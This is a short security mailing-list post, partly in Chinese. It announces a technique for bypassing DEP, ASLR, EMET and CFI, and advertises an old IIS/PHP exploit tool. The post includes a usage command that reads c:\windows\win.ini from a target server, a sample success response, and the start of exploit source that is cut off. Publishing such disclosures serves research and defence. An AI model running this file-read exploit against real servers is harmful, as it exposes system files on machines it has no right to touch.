From: yuange1...@hotmail.com
To: fulldisclosure@seclists.org
Subject: dve bypass dep+aslr+emet+cfi
Date: Sat, 29 Mar 2014 15:31:06 +
dve数据虚拟执行技术对抗dep+aslr+emet+cfi
http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b
注意利用解释型语言与CPU代码相结合的新型病毒 http://t.cn/zYBJa07 文本病毒
Discovered in 2000 for IIS4\IIS5 0day.
.php -> php.exe
the exploit file ver 4.1.1 .
http://seclists.org/fulldisclosure/2012/Apr/13
usage:
iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
yuan can get the filec:\windows\win.ini
HTTP/1.1 200 OK
http://hi.baidu.com/yuange1975/item/b2cc7141c22108e91e19bc2e
the exp file ver4.1.1 .
http://seclists.org/fulldisclosure/2012/Apr/13
usage:
iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
/* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
iise
